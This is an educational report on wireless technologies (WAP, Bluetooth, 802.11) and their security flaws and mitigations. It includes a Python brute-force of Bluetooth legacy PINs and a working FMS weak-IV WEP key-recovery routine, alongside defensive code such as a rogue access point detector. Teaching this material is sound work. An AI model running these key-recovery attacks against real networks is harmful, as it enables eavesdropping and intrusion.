This report was developed to help define the many wireless technologies in use today. Some pros and cons of each technology are listed, and further reference points are given. After reading this report, you will have a better understanding of how the wireless technologies differ and of the security implementations of each. Consider this report a crash course and not a comprehensive study.
Ad-Hoc – This is a peer-to-peer setup in which one wireless client talks directly to another without passing through any access point or proxy. Peers use a common network identifier to communicate with each other.
Single Point of Access – An Access Point is used in this type of setup to connect wireless users to a wired network. The Access Point acts as a bridge between the wireless users and the network they wish to connect to. The Access Point is responsible for authenticating the wireless users via a password and possibly their MAC address. The distance from the wireless system to the Access Point determines the network performance that user will experience: a system 5 feet from the Access Point could monopolize the bandwidth at the expense of users farther away, and a system 20 feet away could experience degraded performance. The area surrounding the Access Point is referred to as the "Basic Service Set", or BSS.
Multiple Access Point – This setup uses multiple Access Points so that many systems can reach the network. Its purpose is to let users roam between Access Points and stay connected to the Access Point closest to them. The Access Points "hand off" the user's session between themselves and ensure the user gets the best network performance available.
Infrared – Cannot penetrate opaque objects
Uses directed or diffused transmission
Directed (requires line of sight)
Diffused (limited to short distances, such as a single room)
WAP (Wireless Application Protocol) – Operates over a multitude of different wireless bearer technologies:
Cellular Digital Packet Data (CDPD)
Code Division Multiple Access (CDMA)
Global System for Mobile Communications (GSM)
Built-in security at the transport layer (WTLS), similar to SSL
Enables a multitude of wireless devices, including cell phones and PDAs, to access the Internet in a common way
WAP (Wireless Application Protocol) has an issue commonly referred to as the “WAP gap.”
(Figure: the WAP gap – Wireless Device -> WAP Gateway -> Internet Server)
WTLS: Wireless Transport Layer Security
Used in versions prior to WAP 2.0
Requires the WAP Gateway to decrypt WTLS transmissions and then re-encrypt them as TLS/SSL
Sensitive data is exposed in clear text as it traverses the gateway
If an attacker were to compromise the gateway, they would be able to access all of the "secure" communications traversing that network juncture. The wireless carrier usually controls the WAP gateway, and the user has no way to learn what security is in place there. This setup requires users to implicitly trust that the gateway is secure and monitored.
WTLS is replaced by TLS in WAP 2.0. The gateway above is no longer needed to translate (decrypt from one standard and re-encrypt to another), since the Internet servers are able to interpret the TLS transmission directly. All data remains encrypted as it passes through the gateway. Because WAP 1.x and WAP 2.0 differ so much, the migration to WAP 2.0 may take a long time.
Ensure the WAP Gateway never stores decrypted content on secondary media (disk or log files)
Implement additional security at the higher (application) layers
Secure the WAP gateway physically so that only administrators have access to the system console
Limit administrative access to the WAP gateway so that it is not available from any remote site outside the firewall
Isolate the WAP application servers from the rest of the network
Add WAP devices to your PKI
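A model of the two architectures, as an added example (not code from the paper): a toy record encryption stands in for WTLS and TLS, and the Gateway class records what an attacker who owns the gateway could read. In the WAP 1.x path the gateway must hold the plaintext in order to re-encrypt it; in the WAP 2.0 path it only sees record sizes. The record format, the cipher and the key names are assumptions made for the demonstration.

```python
"""Model of the "WAP gap": WTLS terminated at the carrier's gateway (WAP 1.x) versus
end-to-end TLS (WAP 2.0). Added illustration, not code from the paper. The record
protection is a toy stand-in (HMAC-SHA256 keystream plus tag), not WTLS or TLS; the
model shows where plaintext exists, not how the real cipher suites work."""
import hashlib
import hmac
import os

NONCE_LEN, TAG_LEN = 12, 16


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Toy counter-mode keystream from HMAC-SHA256 (assumption; demo only)."""
    out, ctr = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + ctr.to_bytes(4, "big"), hashlib.sha256).digest()
        ctr += 1
    return out[:length]


def seal(key: bytes, plaintext: bytes) -> bytes:
    """Produce a record: nonce || ciphertext || tag."""
    nonce = os.urandom(NONCE_LEN)
    ct = bytes(p ^ k for p, k in zip(plaintext, keystream(key, nonce, len(plaintext))))
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()[:TAG_LEN]
    return nonce + ct + tag


def unseal(key: bytes, record: bytes) -> bytes:
    """Check the tag, then decrypt. Raises ValueError on a wrong key or a modified record."""
    nonce, ct, tag = record[:NONCE_LEN], record[NONCE_LEN:-TAG_LEN], record[-TAG_LEN:]
    expect = hmac.new(key, nonce + ct, hashlib.sha256).digest()[:TAG_LEN]
    if not hmac.compare_digest(tag, expect):
        raise ValueError("record tampered or wrong key")
    return bytes(c ^ k for c, k in zip(ct, keystream(key, nonce, len(ct))))


class Gateway:
    """The carrier's WAP gateway. `captured` is what an attacker who owns the box sees."""

    def __init__(self, wtls_key: bytes = b"", tls_key: bytes = b""):
        self.wtls_key, self.tls_key = wtls_key, tls_key
        self.captured = []

    def relay_wap1(self, record: bytes) -> bytes:
        # WAP 1.x: terminate WTLS, re-encrypt as TLS. Plaintext necessarily exists here.
        plaintext = unseal(self.wtls_key, record)
        self.captured.append(plaintext)        # the gap: a compromised gateway logs it
        return seal(self.tls_key, plaintext)

    def relay_wap2(self, record: bytes) -> bytes:
        # WAP 2.0: TLS runs phone-to-server; the gateway forwards opaque bytes.
        self.captured.append(len(record))      # only traffic metadata is visible
        return record


def wap1_exchange(msg: bytes):
    """Phone -> gateway (phone/gateway key) -> server (gateway/server key).
    Returns what the server decrypted and what the gateway captured."""
    k_phone_gw, k_gw_server = os.urandom(16), os.urandom(16)
    gw = Gateway(k_phone_gw, k_gw_server)
    delivered = unseal(k_gw_server, gw.relay_wap1(seal(k_phone_gw, msg)))
    return delivered, gw.captured


def wap2_exchange(msg: bytes):
    """Phone -> gateway -> server with a single key shared phone-to-server."""
    k_end_to_end = os.urandom(16)
    gw = Gateway()
    delivered = unseal(k_end_to_end, gw.relay_wap2(seal(k_end_to_end, msg)))
    return delivered, gw.captured


if __name__ == "__main__":
    request = b"account=12345&transfer=250"      # constructed sample request
    print("WAP 1.x gateway captured:", wap1_exchange(request)[1])
    print("WAP 2.0 gateway captured:", wap2_exchange(request)[1])
```

The point of the model is the `captured` list: under WAP 1.x it holds the request itself, which is exactly what the recommendation "never store decrypted content on secondary media" is trying to contain, whereas under WAP 2.0 the gateway holds nothing an attacker could use beyond record lengths and timing.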
Bluetooth – Can be used to connect almost any device to another device
Operates in the 2.4 GHz ISM frequency band
Supports a range of about 30 feet (10 meters)
Maximum data rate is 1 Mbps
Devices do not need to be in line of sight
Supports data, voice, and content-centric applications
Uses FHSS at up to 1600 hops per second
The signal hops among 79 frequencies at 1 MHz intervals for a high degree of interference immunity
Up to seven simultaneous connections (active slaves in one piconet) can be established and maintained
Will be embedded in future versions of Microsoft Windows and Pocket PCs
Each Bluetooth device stores the following:
48-bit unique device address (BD_ADDR)
128-bit unit key (unique to the device)
Each connection has a link key associated with it
The link key is used to generate the encryption key
The link key is chosen during connection setup (pairing) for two devices that have not previously communicated. After this it is used for authentication.
The link key is not really secret: it is derived from the PIN and from values exchanged in the clear during pairing, so connections can be eavesdropped and deciphered
The encryption can be broken in some cases
A device's address is unique; by tracking a particular address, a person's movements and activities can be tracked
A 4-digit PIN code must be entered manually each time devices pair (and, for devices that do not retain the link key, each time they are used), which can be considered a hassle
To avoid that hassle, the PIN code can be stored in the device's memory or on its hard drive, which creates a security vulnerability
The user chooses the PIN code, and no complexity is required. Users can use '0000' or '1234'
Because most of the problems associated with Bluetooth are inherent in the Bluetooth protocol and its implementations, there are few solutions available. Best practices to date suggest:
Implement the necessary authentication
Implement the necessary encryption mechanisms at the application layer
Avoid the use of unit keys; use combination keys instead
The Bluetooth specification defines 3 security modes:
Mode 1, Non-secure – the device does not initiate any kind of security.
Mode 2, Service-level security – security procedures are initiated after the channel is established; the security policy is defined by the access requirements of the application in use.
Mode 3, Link-level security – security procedures are initiated before the link setup is complete.
Perform the bonding in an environment that is as secure as possible against eavesdroppers, and use long random Bluetooth passkeys.
For specific implementations and security concerning those implementations, please see the white-paper on Bluetooth security at: http://www.bluetooth.com/upload/24Security_Paper.PDF
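Why a short PIN undermines the link key, as an added example (not from the paper or the Bluetooth SIG): the pairing flow below mirrors the legacy scheme in which an initial key is derived from the PIN, a device address and a nonce sent in the clear, each side's random contribution crosses the air XORed with that initial key, and the resulting link key answers a 32-bit challenge/response. Everything except the PIN is visible to an eavesdropper, so the attacker simply tries all 10,000 PINs offline, and with the link key in hand derives the encryption key exactly as the devices do. The SAFER+-based E22/E21/E1/E3 functions are replaced with HMAC-SHA256 stand-ins, and the addresses and PIN are constructed values.

```python
"""Toy model of Bluetooth legacy (PIN-based) pairing, showing why a short PIN lets an
eavesdropper recover the link key and hence the encryption key.
Added example, not from the paper or the Bluetooth SIG. The SAFER+-based E22/E21/E1/E3
functions are replaced by HMAC-SHA256 stand-ins (assumption); the message flow is the
part that matters: everything the attacker needs is sent in clear except the PIN."""
import hashlib
import hmac
import itertools
import os


def bt_prf(key: bytes, *parts: bytes, n: int = 16) -> bytes:
    """HMAC-SHA256 stand-in for the E2x/E1/E3 key functions (not the real SAFER+ ones)."""
    return hmac.new(key, b"".join(parts), hashlib.sha256).digest()[:n]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def legacy_pairing(addr_a: bytes, addr_b: bytes, pin: str, rng=os.urandom):
    """Run pairing plus mutual authentication. Returns the shared link key and the
    transcript an eavesdropper on the air interface would capture."""
    in_rand = rng(16)                                   # sent in clear
    k_init = bt_prf(pin.encode(), addr_b, in_rand)      # E22(PIN, BD_ADDR_B, IN_RAND)
    # combination key: each side's LK_RAND crosses the air XORed with K_init
    lk_rand_a, lk_rand_b = rng(16), rng(16)
    msg_a, msg_b = xor(lk_rand_a, k_init), xor(lk_rand_b, k_init)
    link_key = xor(bt_prf(lk_rand_a, addr_a), bt_prf(lk_rand_b, addr_b))   # E21 per side
    # mutual authentication: challenge in clear, 32-bit SRES in clear
    au_rand_a, au_rand_b = rng(16), rng(16)
    sres_b = bt_prf(link_key, addr_b, au_rand_a, n=4)   # E1: B answers A's challenge
    sres_a = bt_prf(link_key, addr_a, au_rand_b, n=4)   # E1: A answers B's challenge
    transcript = dict(addr_a=addr_a, addr_b=addr_b, in_rand=in_rand, msg_a=msg_a,
                      msg_b=msg_b, au_rand_a=au_rand_a, sres_b=sres_b,
                      au_rand_b=au_rand_b, sres_a=sres_a)
    return link_key, transcript


def link_key_from_pin(pin: bytes, t: dict) -> bytes:
    """What anyone holding the PIN plus the captured transcript can compute."""
    k_init = bt_prf(pin, t["addr_b"], t["in_rand"])
    lk_rand_a, lk_rand_b = xor(t["msg_a"], k_init), xor(t["msg_b"], k_init)
    return xor(bt_prf(lk_rand_a, t["addr_a"]), bt_prf(lk_rand_b, t["addr_b"]))


def crack_pin(t: dict, pin_len: int = 4):
    """Offline brute force over every numeric PIN; both SRES values must match."""
    for digits in itertools.product("0123456789", repeat=pin_len):
        pin = "".join(digits).encode()
        lk = link_key_from_pin(pin, t)
        if (bt_prf(lk, t["addr_b"], t["au_rand_a"], n=4) == t["sres_b"]
                and bt_prf(lk, t["addr_a"], t["au_rand_b"], n=4) == t["sres_a"]):
            return pin.decode(), lk
    return None, None


def encryption_key(link_key: bytes, en_rand: bytes) -> bytes:
    """E3 stand-in: the encryption key is derived from the link key and EN_RAND, and
    EN_RAND is also sent in clear, so the link key is all the attacker needs."""
    return bt_prf(link_key, en_rand)


def passkey_search_space(length: int, alphabet_size: int = 10) -> int:
    """Number of passkeys the brute force above has to try."""
    return alphabet_size ** length


if __name__ == "__main__":
    addr_a, addr_b = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")  # constructed
    link_key, transcript = legacy_pairing(addr_a, addr_b, "4711")
    pin, recovered = crack_pin(transcript)
    print("recovered PIN:", pin, "| link key matches:", recovered == link_key)
    print("4-digit numeric PIN space:", passkey_search_space(4),
          "| 16-character alphanumeric passkey space:", passkey_search_space(16, 62))
```

`passkey_search_space` is the argument for the "long random passkeys" advice: the attack above is a loop over the whole PIN space, so the only lever the user has is the size of that space, and bonding somewhere the transcript cannot be captured in the first place.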
802.11 supports 3 physical layers:
FHSS – Frequency Hopping Spread Spectrum
DSSS – Direct Sequence Spread Spectrum
Infrared (IR)
The technology has since spread into 802.11a, 802.11b and 802.11g:
802.11b supports up to 11 Mbps at 2.4 GHz
802.11a supports up to 54 Mbps at 5 GHz
802.11g supports up to 54 Mbps at 2.4 GHz
802.11b uses only DSSS, which allows greater throughput but is more susceptible to radio signal interference
802.11a networks are up to 5x faster than 802.11b networks, but are not interoperable with them.
Built-in 802.11 security mechanisms:
Media Access Control (MAC) address filtering
Service Set Identifier (SSID) matching
Wired Equivalent Privacy (WEP), which encrypts data with 40- or 104-bit keys (marketed as 64- and 128-bit once the 24-bit IV is counted)
Automated tools exist to crack WEP encryption keys
They exploit a weakness in the RC4 key-scheduling algorithm (the Fluhrer, Mantin and Shamir attack): certain "weak" IVs leak information about the key
Once enough weak-IV packets have been sniffed, the AirSnort tool computes the key in well under a minute; collecting those packets is the slow part
It is a completely passive attack, which makes it extremely difficult to detect
The tools used to perform the attack are freely available for download on the Internet
Media Access Control (MAC) address filtering – MAC addresses can be sniffed and spoofed.
Service Set Identifier (SSID) – broadcast by Access Points and should not be considered secret.
The SSID can be easily sniffed
WEP encryption can be easily cracked
40- or 128-bit Wired Equivalent Privacy – has been broken using tools like AirSnort (above)
Use a strong authentication mechanism
Require mutual authentication between client and server
Utilize end-to-end encryption at the higher protocol layers (e.g. SSH and SSL), or use a VPN solution in place of WEP
Configure the Access Points to keep quiet about the SSID: suppress the SSID in beacon frames and configure the Access Point to ignore broadcast (anonymous) probe requests for it. This only raises the bar slightly, since the SSID still appears in clear text whenever a legitimate client associates.
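The RC4 key-scheduling weakness behind AirSnort, reconstructed as an added example (this is neither the paper's material nor AirSnort's code): every WEP data frame starts with the LLC/SNAP byte 0xAA, so the first keystream byte of every packet is known, and for IVs of the form (A+3, 255, X) that byte leaks secret key byte A about 5% of the time. A vote over a few hundred such packets recovers each byte in turn. The capture is simulated here with a key we pick; the number of weak IVs per byte (256, one per X) and the candidate search width are assumptions for the demo. The same code handles WEP-104 by setting the key length to 13.

```python
"""Reconstruction of the FMS weak-IV attack on WEP-40 (RC4 key-scheduling weakness).
Added example, not the paper's material and not AirSnort's code. The "captured" packets
are simulated with the secret key we pick; the known first plaintext byte is the 0xAA of
the LLC/SNAP header that every WEP data frame starts with."""
import random

SNAP_FIRST_BYTE = 0xAA
KEY_LEN = 5            # WEP-40: 5 secret bytes; the RC4 key is IV(3 bytes) || secret


def rc4_first_keystream_byte(key):
    """Full RC4 KSA over `key` (IV || secret), then the first PRGA output byte."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    j = S[1]                       # PRGA step 1: i = 1, j = S[1]
    S[1], S[j] = S[j], S[1]
    return S[(S[1] + S[j]) & 0xFF]


def partial_ksa(key_prefix, steps):
    """Replay only the first `steps` KSA rounds, which need just the known key bytes."""
    S = list(range(256))
    j = 0
    for i in range(steps):
        j = (j + S[i] + key_prefix[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j


def fms_votes(packets, known_secret):
    """One FMS tally for the secret byte at index len(known_secret)."""
    A = len(known_secret)
    votes = [0] * 256
    for iv, first_ct in packets:
        S, j = partial_ksa(list(iv) + known_secret, A + 3)
        # "resolved" condition: after KSA step A+3 the first PRGA output would be S[A+3]
        if S[1] >= A + 3 or (S[1] + S[S[1]]) & 0xFF != A + 3:
            continue
        z = first_ct ^ SNAP_FIRST_BYTE        # first keystream byte (known plaintext)
        j_next = S.index(z)                   # with ~5% probability, j after step A+3
        votes[(j_next - j - S[A + 3]) & 0xFF] += 1
    return votes


def recover_key(packets, key_len=KEY_LEN, width=6):
    """Byte-by-byte recovery. Each vote is right only ~5% of the time, so search the
    `width` best candidates per position and verify a full candidate key against
    the captured packets (known plaintext) before accepting it."""
    def consistent(secret):
        return all(rc4_first_keystream_byte(list(iv) + secret) ^ SNAP_FIRST_BYTE == ct
                   for iv, ct in packets[:8])

    def search(prefix):
        if len(prefix) == key_len:
            return prefix if consistent(prefix) else None
        votes = fms_votes(packets, prefix)
        for cand in sorted(range(256), key=lambda k: -votes[k])[:width]:
            hit = search(prefix + [cand])
            if hit is not None:
                return hit
        return None

    return search([])


def simulate_capture(secret):
    """Constructed capture: one frame for every IV of the weak form (A+3, 255, X)."""
    packets = []
    for a in range(len(secret)):
        for x in range(256):
            iv = (a + 3, 0xFF, x)
            ks0 = rc4_first_keystream_byte(list(iv) + list(secret))
            packets.append((iv, ks0 ^ SNAP_FIRST_BYTE))   # (IV, first ciphertext byte)
    return packets


if __name__ == "__main__":
    secret = [random.randrange(256) for _ in range(KEY_LEN)]
    capture = simulate_capture(secret)
    print("true key     :", bytes(secret).hex())
    print("recovered key:", bytes(recover_key(capture)).hex())
```

Nothing in the attack transmits: `simulate_capture` stands in for a sniffer, and a real attacker just waits until the access point has cycled through enough of the weak IVs, which is why the page calls the attack passive and hard to detect, and why key length alone (WEP-104) does not help.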
802.11c – bridging of 802.11 frames (802.1D bridge operation)
802.11d – operation in additional regulatory domains (international roaming)
802.11e – QoS enhancements in the MAC
802.11f – Inter Access Point Protocol (IAPP)
802.11g – higher data rates at 2.4 GHz (up to 54 Mbps, backward compatible with 802.11b)
802.11h – Dynamic Channel Selection and Transmit Power Control
802.11i – security enhancements in the MAC
802.11j – 5 GHz globalization among IEEE, ETSI Hiperlan2, ARIB and HiSWANa
Most information below was gathered from SANS, Information Security Magazine and other top information security resources.
a. Eavesdropping
i. Attackers can gain access to wireless transmissions without being physically close to the network
ii. It is difficult to detect if someone is eavesdropping
iii. An attacker can gather critical or confidential material
b. Protecting from Eavesdropping
i. Use encryption such as SSH, SSL, IPSec or a VPN
ii. Prevent the Access Point from broadcasting the SSID
iii. Use authentication and access control (SSID and MAC address filtering) to make it harder for attackers to connect to your network; note that both can be sniffed and spoofed, so neither stops a determined attacker
a. Lost or Stolen Devices
i. Wireless devices can be stolen or lost
ii. Devices can contain confidential corporate information
iii. An attacker can gain access to the network via a stolen device and the information stored on it
iv. Data on wireless devices is typically stored in clear text
b. Minimizing the Risk
i. Audit wireless devices in your environment regularly
ii. Develop strict guidelines and policies for connecting wireless devices to the network
1. Personal Use Restrictions Policy
2. Enforce a Password Policy
3. Antivirus Policy
iii. Encrypt the data that is stored on the wireless devices
iv. Strong authentication
v. Device Access Controls and Secure Configuration
a. Denial of Service (DOS)
i. An attacker can jam all communications on the wireless side
ii. The cost of performing a DOS is minimal
iii. The attack is simple to perform with common tools easily found on the Internet
b. Protecting against a DOS
i. In small environments use Infrared instead of RF if possible
ii. Operate wireless networks only from shielded buildings
iii. A DOS attack is very difficult to defend against. When under such an attack, locate and disable the attacking device.
a. Wireless viruses already exist
i. Timofonica is a worm that spread between PCs by e-mail and sent SMS messages to randomly generated mobile phone numbers through a carrier's Internet SMS gateway.
ii. Phage is a virus that destroys applications and data on devices running the Palm OS.
b. Protecting Wireless devices from Malware
i. Install an anti-virus product designed specifically for wireless devices, from vendors such as McAfee, Trend Micro, F-Secure or Symantec.
a. Masquerading
i. Rogue clients pretend to be a legitimate endpoint
1. An attacker could obtain a working IP address via DHCP or by guessing
2. The rogue client then becomes a node on the internal network, behind all firewalls
ii. Rogue Access Points could trick clients into logging in
1. The attacker would place the rogue Access Point so that it presents the strongest signal
2. This would allow the attacker to harvest critical or confidential information or authentication credentials
iii. This attack is difficult to detect
b. Protecting against masquerading
i. Clients must be authenticated before being allowed to connect
ii. Use strong authentication mechanisms that an attacker cannot spoof, such as public-key authentication
iii. Choose authentication mechanisms that will not reveal credentials (passwords) or other critical or confidential information to a rogue Access Point
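Rogue Access Points are hard to spot by eye but easy to spot against an inventory. The following added example (not from the paper) runs three checks over constructed site-survey lines: an unknown BSSID advertising a corporate SSID (an evil twin), flagged more loudly when it out-powers every authorised AP because clients will prefer it; a look-alike SSID from an unknown BSSID; and an authorised BSSID seen on two channels at once, which is what spoofing one of our APs' MAC addresses looks like from the air. The inventory, the survey format and the signal heuristic are assumptions; a real run would parse a wireless scanner's output instead.

```python
"""Detecting rogue Access Points and evil twins from a site survey.
Added example, not from the paper. The inventory and the survey lines are constructed
test data; a real run would feed in the output of a wireless scanner instead."""
from collections import defaultdict

# Authorised Access Points: SSID -> BSSIDs we deployed (constructed inventory)
INVENTORY = {
    "corp-wifi": {"00:0c:41:aa:bb:01", "00:0c:41:aa:bb:02"},
    "corp-guest": {"00:0c:41:aa:bb:03"},
}

# Constructed scanner output: "ssid bssid channel signal_dbm", one AP per line
SURVEY = """\
corp-wifi   00:0c:41:aa:bb:01   6  -52
corp-wifi   00:0c:41:aa:bb:02  11  -67
corp-wifi   00:1e:58:12:34:56   6  -31
corp-guest  00:0c:41:aa:bb:03   1  -70
corp_wifi   00:1e:58:12:34:57   6  -35
corp-wifi   00:0c:41:aa:bb:01   1  -40
"""


def parse_survey(text):
    """Turn the scanner lines into dicts; BSSIDs are normalised to lower case."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ssid, bssid, channel, signal = line.split()
        rows.append({"ssid": ssid, "bssid": bssid.lower(),
                     "channel": int(channel), "signal": int(signal)})
    return rows


def normalise(ssid):
    """Collapse case and the separators attackers swap in look-alike SSIDs."""
    return "".join(ch for ch in ssid.lower() if ch.isalnum())


def find_rogues(rows, inventory):
    """Return (bssid, ssid, reason) findings:
    - evil twin: our SSID from a BSSID we never deployed (noting if it out-powers ours)
    - look-alike: an unknown BSSID using an SSID that differs from ours only cosmetically
    - clone: an authorised BSSID seen on more than one channel (MAC spoofing of our AP)"""
    findings = []
    known = {b for bssids in inventory.values() for b in bssids}
    strongest_ours = defaultdict(lambda: -999)   # best signal from an authorised AP per SSID
    channels = defaultdict(set)                  # channels each BSSID was seen on
    for r in rows:
        channels[r["bssid"]].add(r["channel"])
        if r["bssid"] in inventory.get(r["ssid"], ()):
            strongest_ours[r["ssid"]] = max(strongest_ours[r["ssid"]], r["signal"])
    for r in rows:
        if r["ssid"] in inventory and r["bssid"] not in inventory[r["ssid"]]:
            reason = "evil twin: unknown BSSID advertising our SSID"
            if r["signal"] > strongest_ours[r["ssid"]]:
                reason += " (stronger than any authorised AP: clients will prefer it)"
            findings.append((r["bssid"], r["ssid"], reason))
        elif r["bssid"] not in known:
            for ours in inventory:
                if r["ssid"] != ours and normalise(r["ssid"]) == normalise(ours):
                    findings.append((r["bssid"], r["ssid"], f"look-alike of {ours!r}"))
    for bssid, chans in channels.items():
        if bssid in known and len(chans) > 1:
            findings.append((bssid, "-", f"authorised BSSID seen on channels "
                                         f"{sorted(chans)}: possible clone"))
    return findings


if __name__ == "__main__":
    for bssid, ssid, reason in find_rogues(parse_survey(SURVEY), INVENTORY):
        print(f"{bssid}  {ssid:<12} {reason}")
```

Authentication that does not hand credentials to whoever answers the probe (the mutual, public-key based mechanisms recommended above) is what actually defeats a rogue AP; a survey like this is how you find out one is there.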
Bluetooth versus 802.11 (Wi-Fi):
802.11 (Wi-Fi) – has been around longer and is more mature; requires more power than handheld-sized devices or phones can supply; 300-plus feet range; uses an IP connection; 6-54 Mbps throughput
Bluetooth – still an emerging technology; less than 2 Mbps throughput
(Figure 3: http://www.kerton.com/papers/BT-WF.pdf)